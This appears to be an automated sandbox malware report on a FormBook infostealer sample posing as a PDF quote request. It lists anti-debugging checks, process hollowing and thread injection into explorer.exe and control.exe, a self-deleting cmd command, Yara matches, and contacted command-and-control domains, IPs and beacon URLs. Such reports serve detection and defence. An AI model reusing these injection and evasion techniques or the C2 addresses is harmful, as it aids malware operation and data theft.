Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C8E00 mov eax, dword ptr fs:[00000030h] 7_2_047C8E00
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851608 mov eax, dword ptr fs:[00000030h] 7_2_04851608
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A76E2 mov eax, dword ptr fs:[00000030h] 7_2_047A76E2
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C16E0 mov ecx, dword ptr fs:[00000030h] 7_2_047C16E0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C36CC mov eax, dword ptr fs:[00000030h] 7_2_047C36CC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D8EC7 mov eax, dword ptr fs:[00000030h] 7_2_047D8EC7
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0484FE3F mov eax, dword ptr fs:[00000030h] 7_2_0484FE3F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h] 7_2_0485AE44
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h] 7_2_0485AE44
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04817794 mov eax, dword ptr fs:[00000030h] 7_2_04817794
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04817794 mov eax, dword ptr fs:[00000030h] 7_2_04817794
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04817794 mov eax, dword ptr fs:[00000030h] 7_2_04817794
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AFF60 mov eax, dword ptr fs:[00000030h] 7_2_047AFF60
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AEF40 mov eax, dword ptr fs:[00000030h] 7_2_047AEF40
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CE730 mov eax, dword ptr fs:[00000030h] 7_2_047CE730
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h] 7_2_04794F2E
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h] 7_2_04794F2E
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BF716 mov eax, dword ptr fs:[00000030h] 7_2_047BF716
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h] 7_2_047CA70E
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h] 7_2_047CA70E
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D37F5 mov eax, dword ptr fs:[00000030h] 7_2_047D37F5
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0486070D mov eax, dword ptr fs:[00000030h] 7_2_0486070D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0486070D mov eax, dword ptr fs:[00000030h] 7_2_0486070D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h] 7_2_0482FF10
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h] 7_2_0482FF10
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04868F6A mov eax, dword ptr fs:[00000030h] 7_2_04868F6A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A8794 mov eax, dword ptr fs:[00000030h] 7_2_047A8794
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04813884 mov eax, dword ptr fs:[00000030h] 7_2_04813884
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04813884 mov eax, dword ptr fs:[00000030h] 7_2_04813884
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h] 7_2_047B0050
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h] 7_2_047B0050
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h] 7_2_047AB02A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h] 7_2_047AB02A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h] 7_2_047AB02A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h] 7_2_047AB02A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h] 7_2_047C002D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h] 7_2_047C002D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h] 7_2_047C002D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h] 7_2_047C002D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h] 7_2_047C002D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0482B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482B8D0 mov ecx, dword ptr fs:[00000030h] 7_2_0482B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0482B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0482B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0482B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0482B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04864015 mov eax, dword ptr fs:[00000030h] 7_2_04864015
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04864015 mov eax, dword ptr fs:[00000030h] 7_2_04864015
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047958EC mov eax, dword ptr fs:[00000030h] 7_2_047958EC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04817016 mov eax, dword ptr fs:[00000030h] 7_2_04817016
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04817016 mov eax, dword ptr fs:[00000030h] 7_2_04817016
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04817016 mov eax, dword ptr fs:[00000030h] 7_2_04817016
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h] 7_2_047940E1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h] 7_2_047940E1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h] 7_2_047940E1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CF0BF mov ecx, dword ptr fs:[00000030h] 7_2_047CF0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h] 7_2_047CF0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h] 7_2_047CF0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D90AF mov eax, dword ptr fs:[00000030h] 7_2_047D90AF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h] 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h] 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h] 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h] 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h] 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h] 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04861074 mov eax, dword ptr fs:[00000030h] 7_2_04861074
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04852073 mov eax, dword ptr fs:[00000030h] 7_2_04852073
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799080 mov eax, dword ptr fs:[00000030h] 7_2_04799080
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h] 7_2_0479B171
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h] 7_2_0479B171
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479C962 mov eax, dword ptr fs:[00000030h] 7_2_0479C962
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048169A6 mov eax, dword ptr fs:[00000030h] 7_2_048169A6
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h] 7_2_047BB944
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h] 7_2_047BB944
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h] 7_2_048151BE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h] 7_2_048151BE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h] 7_2_048151BE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h] 7_2_048151BE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C513A mov eax, dword ptr fs:[00000030h] 7_2_047C513A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C513A mov eax, dword ptr fs:[00000030h] 7_2_047C513A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h] 7_2_047B4120
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h] 7_2_047B4120
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h] 7_2_047B4120
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h] 7_2_047B4120
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B4120 mov ecx, dword ptr fs:[00000030h] 7_2_047B4120
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048241E8 mov eax, dword ptr fs:[00000030h] 7_2_048241E8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799100 mov eax, dword ptr fs:[00000030h] 7_2_04799100
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799100 mov eax, dword ptr fs:[00000030h] 7_2_04799100
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799100 mov eax, dword ptr fs:[00000030h] 7_2_04799100
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0479B1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0479B1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0479B1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h] 7_2_047C61A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h] 7_2_047C61A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C2990 mov eax, dword ptr fs:[00000030h] 7_2_047C2990
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BC182 mov eax, dword ptr fs:[00000030h] 7_2_047BC182
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CA185 mov eax, dword ptr fs:[00000030h] 7_2_047CA185
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D927A mov eax, dword ptr fs:[00000030h] 7_2_047D927A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h] 7_2_04799240
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h] 7_2_04799240
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h] 7_2_04799240
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h] 7_2_04799240
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h] 7_2_047D4A2C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h] 7_2_047D4A2C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B3A1C mov eax, dword ptr fs:[00000030h] 7_2_047B3A1C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04795210 mov eax, dword ptr fs:[00000030h] 7_2_04795210
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04795210 mov ecx, dword ptr fs:[00000030h] 7_2_04795210
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04795210 mov eax, dword ptr fs:[00000030h] 7_2_04795210
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04795210 mov eax, dword ptr fs:[00000030h] 7_2_04795210
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h] 7_2_0479AA16
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h] 7_2_0479AA16
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A8A0A mov eax, dword ptr fs:[00000030h] 7_2_047A8A0A
Enables debug privileges
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.rootedwithlovejax.com
Source: C:\Windows\explorer.exe Domain query: www.essentials-trading.com
Source: C:\Windows\explorer.exe Domain query: www.coloradocouponclub.com
Source: C:\Windows\explorer.exe Network Connect: 107.178.142.156 80
Source: C:\Windows\explorer.exe Domain query: www.tennesseewheelrepair.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.244.61 80
Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80
Source: C:\Windows\explorer.exe Domain query: www.quickeasybites.com
Source: C:\Windows\explorer.exe Domain query: www.ssfgasia.com
Source: C:\Windows\explorer.exe Domain query: www.hzmsbg.com
Source: C:\Windows\explorer.exe Network Connect: 199.59.242.153 80
Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe Network Connect: 66.96.161.160 80
Source: C:\Windows\explorer.exe Network Connect: 216.239.36.21 80
Source: C:\Windows\explorer.exe Domain query: www.kf350.com
Source: C:\Windows\explorer.exe Domain query: www.1364kensington.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.desertfoxindustries.com
Source: C:\Windows\explorer.exe Domain query: www.pierresplayhouse.com
Source: C:\Windows\explorer.exe Domain query: www.thecapitalhut.com
Source: C:\Windows\explorer.exe Domain query: www.luegomusic.com
Contains functionality to prevent local Windows debugging
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile, 0_2_72AD1000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Section loaded: unknown target: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3424
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: E70000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
Source: explorer.exe, 00000005.00000002.909699589.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.669092694.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.671246552.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match, with the same file sources (memory dumps and unpacked PE files) as listed under Stealing of Sensitive Information above.
Behavior Graph (ID: 383968, Sample: RFQ_AP65425652_032421 isu-i..., Startdate: 08/04/2021, Architecture: WINDOWS, Score: 100). Graph-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 7 other signatures; domain www.lideresdeimmunocal.com. Process chain recovered from the graph:

RFQ_AP65425652_032421 isu-isu,pdf.exe (drops C:\Users\user\AppData\Local\...\fsfomt.dll, PE32; maps a DLL or memory area into another process)
  -> RFQ_AP65425652_032421 isu-isu,pdf.exe, second instance (modifies the context of a thread in another process, maps a DLL or memory area into another process, process hollowing, queues an APC in another process)
    -> explorer.exe, injected (system process connects to network: luegomusic.com 162.241.244.61 port 80 UNIFIEDLAYER-AS-1US United States, www.pierresplayhouse.com 199.59.242.153 port 80 BODIS-NJUS United States, and 19 other IPs or domains)
      -> control.exe (modifies the context of a thread in another process, maps a DLL or memory area into another process, tries to detect virtualization through RDTSC time measurements)
        -> cmd.exe
          -> conhost.exe

Contacted Public IPs

IP               Domain                              Country        ASN     ASN Name                      Malicious
199.59.242.153   www.pierresplayhouse.com            United States  395082  BODIS-NJUS                    true
35.246.6.109     td-balancer-euw2-6-109.wixdns.net   United States  15169   GOOGLEUS                      false
66.96.161.160    www.1364kensington.com              United States  29873   BIZLAND-SDUS                  true
216.239.36.21    www.rootedwithlovejax.com           United States  15169   GOOGLEUS                      false
107.178.142.156  www.kf350.com                       United States  8100    ASN-QUADRANET-GLOBALUS        true
162.241.244.61   luegomusic.com                      United States  46606   UNIFIEDLAYER-AS-1US           true
34.102.136.180   ssfgasia.com                        United States  15169   GOOGLEUS                      false
184.168.131.241  desertfoxindustries.com             United States  26496   AS-26496-GO-DADDY-COM-LLCUS   true

Contacted Domains

Name IP Active
luegomusic.com 162.241.244.61 true
ssfgasia.com 34.102.136.180 true
desertfoxindustries.com 184.168.131.241 true
www.rootedwithlovejax.com 216.239.36.21 true
td-balancer-euw2-6-109.wixdns.net 35.246.6.109 true
www.kf350.com 107.178.142.156 true
www.1364kensington.com 66.96.161.160 true
www.pierresplayhouse.com 199.59.242.153 true
tennesseewheelrepair.com 184.168.131.241 true
www.essentials-trading.com unknown unknown
www.coloradocouponclub.com unknown unknown
www.tennesseewheelrepair.com unknown unknown
www.quickeasybites.com unknown unknown
www.ssfgasia.com unknown unknown
www.hzmsbg.com unknown unknown
www.lideresdeimmunocal.com unknown unknown
www.desertfoxindustries.com unknown unknown
www.thecapitalhut.com unknown unknown
www.luegomusic.com unknown unknown

Contacted URLs

Name  Malicious  Antivirus Detection  Reputation
http://www.1364kensington.com/pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0  true  Avira URL Cloud: safe  unknown
http://www.thecapitalhut.com/pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0  false  Avira URL Cloud: safe  unknown
http://www.desertfoxindustries.com/pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0  true  Avira URL Cloud: safe  unknown
http://www.kf350.com/pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0  true  Avira URL Cloud: safe  unknown
http://www.tennesseewheelrepair.com/pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0  true  Avira URL Cloud: safe  unknown
www.luegomusic.com/pe0r/  true  Avira URL Cloud: safe  low
http://www.luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0  true  Avira URL Cloud: safe  unknown
http://www.rootedwithlovejax.com/pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0  false  Avira URL Cloud: safe  unknown
http://www.pierresplayhouse.com/pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0  true  Avira URL Cloud: safe  unknown
http://www.ssfgasia.com/pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0  false  Avira URL Cloud: safe  unknown